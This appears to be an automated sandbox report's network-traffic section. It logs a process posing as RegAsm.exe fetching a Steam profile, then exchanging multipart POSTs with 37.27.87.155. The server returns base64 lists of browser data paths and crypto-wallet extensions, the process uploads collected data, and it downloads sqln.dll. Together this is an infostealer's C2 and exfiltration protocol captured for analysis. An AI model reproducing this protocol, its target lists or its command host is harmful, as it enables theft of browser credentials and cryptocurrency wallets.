                                                                                                                                                                                                                                                                                                Apr 19, 2024 17:07:57.915806055 CEST1.1.1.1192.168.2.40x814cNo error (0)steamcommunity.com184.30.122.179A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                                                                                                                                                                                • steamcommunity.com
                                                                                                                                                                                                                                                                                                • 37.27.87.155

                                                                                                                                                                                                                                                                                                HTTPS Proxied Packets

                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                0192.168.2.449730184.30.122.1794437532C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-04-19 15:07:58 UTC119OUTGET /profiles/76561199673019888 HTTP/1.1
                                                                                                                                                                                                                                                                                                Host: steamcommunity.com
                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                2024-04-19 15:07:58 UTC1870INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;
                                                                                                                                                                                                                                                                                                Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                Date: Fri, 19 Apr 2024 15:07:58 GMT
                                                                                                                                                                                                                                                                                                Content-Length: 33790
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                Set-Cookie: sessionid=33457ce14201bbf752e065d7; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                Set-Cookie: steamCountry=US%7C0260b8e04ad19c244dfaa60e7b0ec044; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                                                                2024-04-19 15:07:58 UTC14514INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                                                                                                                                                                                                                                                                2024-04-19 15:07:58 UTC10062INData Raw: 6f 62 61 6c 5f 61 63 74 69 6f 6e 5f 6c 69 6e 6b 22 20 69 64 3d 22 6c 61 6e 67 75 61 67 65 5f 70 75 6c 6c 64 6f 77 6e 22 20 6f 6e 63 6c 69 63 6b 3d 22 53 68 6f 77 4d 65 6e 75 28 20 74 68 69 73 2c 20 27 6c 61 6e 67 75 61 67 65 5f 64 72 6f 70 64 6f 77 6e 27 2c 20 27 72 69 67 68 74 27 20 29 3b 22 3e 6c 61 6e 67 75 61 67 65 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 5f 62 6c 6f 63 6b 5f 6e 65 77 22 20 69 64 3d 22 6c 61 6e 67 75 61 67 65 5f 64 72 6f 70 64 6f 77 6e 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 22 3e 0d 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 5f 62 6f 64 79 20 70 6f 70 75 70 5f 6d 65 6e 75 22 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09
                                                                                                                                                                                                                                                                                                Data Ascii: obal_action_link" id="language_pulldown" onclick="ShowMenu( this, 'language_dropdown', 'right' );">language</span><div class="popup_block_new" id="language_dropdown" style="display: none;"><div class="popup_body popup_menu">
                                                                                                                                                                                                                                                                                                2024-04-19 15:07:58 UTC9214INData Raw: 74 65 61 6d 67 61 6d 65 73 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 53 54 41 54 53 5f 42 41 53 45 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 70 61 72 74 6e 65 72 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 49 4e 54 45 52 4e 41 4c 5f 53 54 41 54 53 5f 42 41 53 45 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 65 61 6d 73 74 61 74 73 2e 76 61 6c 76 65 2e 6f 72 67 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 49 4e 5f 43 4c 49 45 4e 54 26 71 75 6f 74 3b 3a 66 61 6c 73 65 2c 26 71 75 6f 74 3b 55 53 45 5f 50 4f 50 55 50 53 26 71 75 6f 74 3b 3a 66 61 6c 73 65 2c 26 71 75 6f 74 3b 53 54 4f 52 45 5f 49 43 4f 4e 5f 42 41
                                                                                                                                                                                                                                                                                                Data Ascii: teamgames.com\/&quot;,&quot;STATS_BASE_URL&quot;:&quot;https:\/\/partner.steampowered.com\/&quot;,&quot;INTERNAL_STATS_BASE_URL&quot;:&quot;https:\/\/steamstats.valve.org\/&quot;,&quot;IN_CLIENT&quot;:false,&quot;USE_POPUPS&quot;:false,&quot;STORE_ICON_BA


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                1192.168.2.44973137.27.87.1554437532C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-04-19 15:07:59 UTC169OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                                                                                Host: 37.27.87.155
                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:00 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                Date: Fri, 19 Apr 2024 15:07:59 GMT
                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                2192.168.2.44973237.27.87.1554437532C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:00 UTC261OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----BGIIDAEBGCAAECAKFHII
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                                                                                Host: 37.27.87.155
                                                                                                                                                                                                                                                                                                Content-Length: 279
                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:00 UTC279OUTData Raw: 2d 2d 2d 2d 2d 2d 42 47 49 49 44 41 45 42 47 43 41 41 45 43 41 4b 46 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 36 36 31 44 39 30 43 38 32 33 33 32 36 33 32 34 32 37 36 35 39 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 2d 31 31 65 65 2d 38 63 31 38 2d 38 30 36 65 36 66 36 65 36 39 36 33 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 49 44 41 45 42 47 43 41 41 45 43 41 4b 46 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 35 32 31 66 33 66 32 65 33 63 38 64 62 39 37 32 35 33 39 39 31 61 30 37 33 61 38 66 37 31 0d 0a 2d 2d 2d 2d 2d 2d
                                                                                                                                                                                                                                                                                                Data Ascii: ------BGIIDAEBGCAAECAKFHIIContent-Disposition: form-data; name="hwid"B661D90C82332632427659-a33c7340-61ca-11ee-8c18-806e6f6e6963------BGIIDAEBGCAAECAKFHIIContent-Disposition: form-data; name="build_id"c1521f3f2e3c8db97253991a073a8f71------
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:01 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                Date: Fri, 19 Apr 2024 15:08:01 GMT
                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:01 UTC69INData Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 30 7c 63 39 36 31 30 30 35 38 66 66 62 33 34 36 38 39 64 63 35 65 30 30 65 33 61 36 31 37 65 35 30 62 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 30 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: 3a1|1|1|0|c9610058ffb34689dc5e00e3a617e50b|1|1|1|0|0|50000|00


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                3192.168.2.44973337.27.87.1554437532C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:01 UTC261OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----BAKFCBFHJDHJKECAKEHI
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                                                                                Host: 37.27.87.155
                                                                                                                                                                                                                                                                                                Content-Length: 331
                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:01 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 42 41 4b 46 43 42 46 48 4a 44 48 4a 4b 45 43 41 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 39 36 31 30 30 35 38 66 66 62 33 34 36 38 39 64 63 35 65 30 30 65 33 61 36 31 37 65 35 30 62 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 46 43 42 46 48 4a 44 48 4a 4b 45 43 41 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 35 32 31 66 33 66 32 65 33 63 38 64 62 39 37 32 35 33 39 39 31 61 30 37 33 61 38 66 37 31 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 46 43 42 46 48 4a 44 48 4a 4b 45 43 41 4b 45 48 49 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                Data Ascii: ------BAKFCBFHJDHJKECAKEHIContent-Disposition: form-data; name="token"c9610058ffb34689dc5e00e3a617e50b------BAKFCBFHJDHJKECAKEHIContent-Disposition: form-data; name="build_id"c1521f3f2e3c8db97253991a073a8f71------BAKFCBFHJDHJKECAKEHICont
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:02 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                Date: Fri, 19 Apr 2024 15:08:02 GMT
                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:02 UTC1564INData Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45
                                                                                                                                                                                                                                                                                                Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                4192.168.2.44973437.27.87.1554437532C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:03 UTC261OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----KFCBAEHCAEGDHJKFHJKF
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                                                                                Host: 37.27.87.155
                                                                                                                                                                                                                                                                                                Content-Length: 331
                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:03 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 4b 46 43 42 41 45 48 43 41 45 47 44 48 4a 4b 46 48 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 39 36 31 30 30 35 38 66 66 62 33 34 36 38 39 64 63 35 65 30 30 65 33 61 36 31 37 65 35 30 62 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 43 42 41 45 48 43 41 45 47 44 48 4a 4b 46 48 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 35 32 31 66 33 66 32 65 33 63 38 64 62 39 37 32 35 33 39 39 31 61 30 37 33 61 38 66 37 31 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 43 42 41 45 48 43 41 45 47 44 48 4a 4b 46 48 4a 4b 46 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                Data Ascii: ------KFCBAEHCAEGDHJKFHJKFContent-Disposition: form-data; name="token"c9610058ffb34689dc5e00e3a617e50b------KFCBAEHCAEGDHJKFHJKFContent-Disposition: form-data; name="build_id"c1521f3f2e3c8db97253991a073a8f71------KFCBAEHCAEGDHJKFHJKFCont
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:03 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                Date: Fri, 19 Apr 2024 15:08:03 GMT
                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:03 UTC5165INData Raw: 31 34 32 30 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                                                                                                                                                                                                                                                                Data Ascii: 1420TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                5192.168.2.44973537.27.87.1554437532C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:04 UTC262OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----AKJDGIEHCAEHIEBFBKKK
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                                                                                Host: 37.27.87.155
                                                                                                                                                                                                                                                                                                Content-Length: 8381
                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:04 UTC8381OUTData Raw: 2d 2d 2d 2d 2d 2d 41 4b 4a 44 47 49 45 48 43 41 45 48 49 45 42 46 42 4b 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 39 36 31 30 30 35 38 66 66 62 33 34 36 38 39 64 63 35 65 30 30 65 33 61 36 31 37 65 35 30 62 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4a 44 47 49 45 48 43 41 45 48 49 45 42 46 42 4b 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 35 32 31 66 33 66 32 65 33 63 38 64 62 39 37 32 35 33 39 39 31 61 30 37 33 61 38 66 37 31 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4a 44 47 49 45 48 43 41 45 48 49 45 42 46 42 4b 4b 4b 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                Data Ascii: ------AKJDGIEHCAEHIEBFBKKKContent-Disposition: form-data; name="token"c9610058ffb34689dc5e00e3a617e50b------AKJDGIEHCAEHIEBFBKKKContent-Disposition: form-data; name="build_id"c1521f3f2e3c8db97253991a073a8f71------AKJDGIEHCAEHIEBFBKKKCont
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:05 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                Date: Fri, 19 Apr 2024 15:08:05 GMT
                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:05 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                6192.168.2.44973637.27.87.1554437532C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:05 UTC177OUTGET /sqln.dll HTTP/1.1
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                                                                                Host: 37.27.87.155
                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:06 UTC248INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                Date: Fri, 19 Apr 2024 15:08:05 GMT
                                                                                                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                                Content-Length: 2459136
                                                                                                                                                                                                                                                                                                Last-Modified: Thu, 18 Apr 2024 12:03:08 GMT
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                ETag: "66210bfc-258600"
                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:06 UTC16136INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:06 UTC16384INData Raw: cd 1e 00 e9 ba 58 1d 00 e9 7e 65 1b 00 e9 1b f0 1c 00 e9 01 21 1c 00 e9 b9 2a 1f 00 e9 d7 46 00 00 e9 92 83 17 00 e9 c5 ed 1e 00 e9 e8 57 03 00 e9 fa 7c 1b 00 e9 3e e1 00 00 e9 bd f4 1a 00 e9 b4 7c 00 00 e9 bf ca 1c 00 e9 4c db 1a 00 e9 31 31 1a 00 e9 34 e5 1c 00 e9 36 f1 1d 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                                                                                                                                                                                                                Data Ascii: X~e!*FW|>|L1146
